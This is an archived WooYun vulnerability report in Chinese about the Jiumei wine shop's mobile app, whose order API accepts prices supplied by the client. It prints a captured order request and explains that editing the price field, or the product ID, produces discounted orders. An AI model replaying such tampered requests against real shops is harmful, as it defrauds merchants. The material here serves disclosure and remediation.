当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-044151

漏洞标题:酒美网手机客户端app订单生成漏洞(想打几折自己做主)

相关厂商:酒美网

漏洞作者: 带馅儿馒头

提交时间:2013-11-26 22:05

修复时间:2013-12-01 22:06

公开时间:2013-12-01 22:06

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-11-26: 细节已通知厂商并且等待厂商处理中
2013-12-01: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT~继续求礼物

详细说明:

酒美网的app端订单生成存在设计缺陷,导致可构造数据包生成订单;
1.首先在app端正常生成一个订单得到相关数据参数,如生成了一个订单得到数据包如下:

POST http://appapi.jiumei.com/interface.aspx HTTP/1.1
Host: appapi.jiumei.com
Connection: close
Accept-Encoding: gzip
Content-Length: 1325
Connection: close
Cookie: ASP.NET_SessionId=s53b2yvztzmtyoerihzvel34
User-Agent: 酒美网 3.0 
{"ProvinceCode":"001001","Mobile":"13800138000","Paid":"0","DeliveryType":"001","CountryCode":"001","InvoiceType":"1","InvoiceCaption":"%E6%B2%A1%E6%9C%89%E5%A4%87%E6%B3%A8","PayType":"04","NeedProductList":"1","usersession":"u03oobrjcd0sfcgzpuzebzxv&&13xxxxxxx3","DeliveryPrice":"0","TelePhone":"","Note":"%E6%B2%A1%E6%9C%89%E7%95%99%E8%A8%80","TotalPrice":"362","RegionCode":"001001001001","Address":"%E5%8C%97%E4%BA%AC%E5%8C%97%E4%BA%AC%E5%B8%82%E8%BE%96%E5%8C%BA%E4%B8%9C%E5%9F%8E%E5%8C%BA","NeedInvoice":"1","CustomerID":"13xxxxxxx3","InvoiceContent":"111","AgentCode":"iOS","DeliveryTypeName":"%E6%97%B6%E9%97%B4%E4%B8%8D%E9%99%90","ZipCode":"010000","DiscountPrice":"0","Method":"Sub_NewOrder","OrderDetailList":[{"IsGift":false,"VIPPRICE":362,"ProductCode":"rg001870","IsCharge":"1","Note":"","UnitPrice":362,"PromotionCode":"","SuitCode":false,"ProductName":"%E6%BE%B3%E5%A4%A7%E5%88%A9%E4%BA%9A%E7%BB%B4%E5%A4%9A%E5%88%A9%E4%BA%9A%E4%BA%9A%E6%8B%89%E6%B2%B3%E8%B0%B7%E4%BC%98%E4%BC%B6%E9%85%92%E5%BA%84%E7%89%B9%E5%B9%B2%E9%BB%91%E6%AF%94%E8%AF%BA2010%E6%A1%83%E7%BA%A2%E8%91%A1%E8%90%84%E9%85%92","TotalPrice":362,"DiscountPrice":0,"Count":1}],"CityCode":"001001001","ProductPrice":"362","CustomerName":"%E9%A6%92%E5%A4%B4%E5%93%A5","DeliveryTimeType":"1228456846128","PayTypeName":"%E6%94%AF%E4%BB%98%E5%AE%9D"}


2.通过对上面的数据包的分析,发现所有生成订单的要素都已经在数据中了,我们尝试直接构造以上的数据包提交请求,如将价格由“362”改成“36”元,来实现我们任意折扣的想法;

1.png


3.接下来我们来看看这个生成的订单的详情,发现已经成功生成该商品的36元价格订单;

2.png


4.哈哈,生成订单之后,就能通过手机支付宝付款咯~这里就不测试了~
PS:当然我们直接修改商品id,就能以任意折扣,购买任意商品咯,虽然可能不能1元购物,但是打点折扣应该没问题的,呵呵~~

漏洞证明:

见详细说明

修复方案:

校验的问题呀

版权声明:转载请注明来源 带馅儿馒头@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2013-12-01 22:06

厂商回复:

最新状态:

2013-12-03:呃,这果断是年关送礼哇,哈哈. 礼物随上个一起发送,请记得接受,感谢馒头!

漏洞评价:

评论

  1. 2013-12-03 15:42 | 带馅儿馒头 ( 普通白帽子 | Rank:1278 漏洞数:143 | 心在,梦在)

    @酒美网 我晕,你现在才来评论~瀑布汗呀~

  2. 2013-12-08 16:15 | 寂寞的瘦子 ( 普通白帽子 | Rank:242 漏洞数:53 | 一切语言转汇编理论)

    @带馅儿馒头 你是用啥方法用burp对手机的http进行抓包的

  3. 2013-12-09 09:22 | zzR 认证白帽子 ( 核心白帽子 | Rank:1382 漏洞数:122 | 收wb 1:5 无限量收 [平台担保])

    @寂寞的瘦子 http://drops.wooyun.org/tips/749

  4. 2013-12-09 09:34 | 寂寞的瘦子 ( 普通白帽子 | Rank:242 漏洞数:53 | 一切语言转汇编理论)

    @zzR 艹,你个吊丝啊。啥时候写的,一直关注你的app终结系列,也不通知俺一下。

  5. 2013-12-09 09:41 | zzR 认证白帽子 ( 核心白帽子 | Rank:1382 漏洞数:122 | 收wb 1:5 无限量收 [平台担保])

    @寂寞的瘦子 我是默默的活雷锋 -0-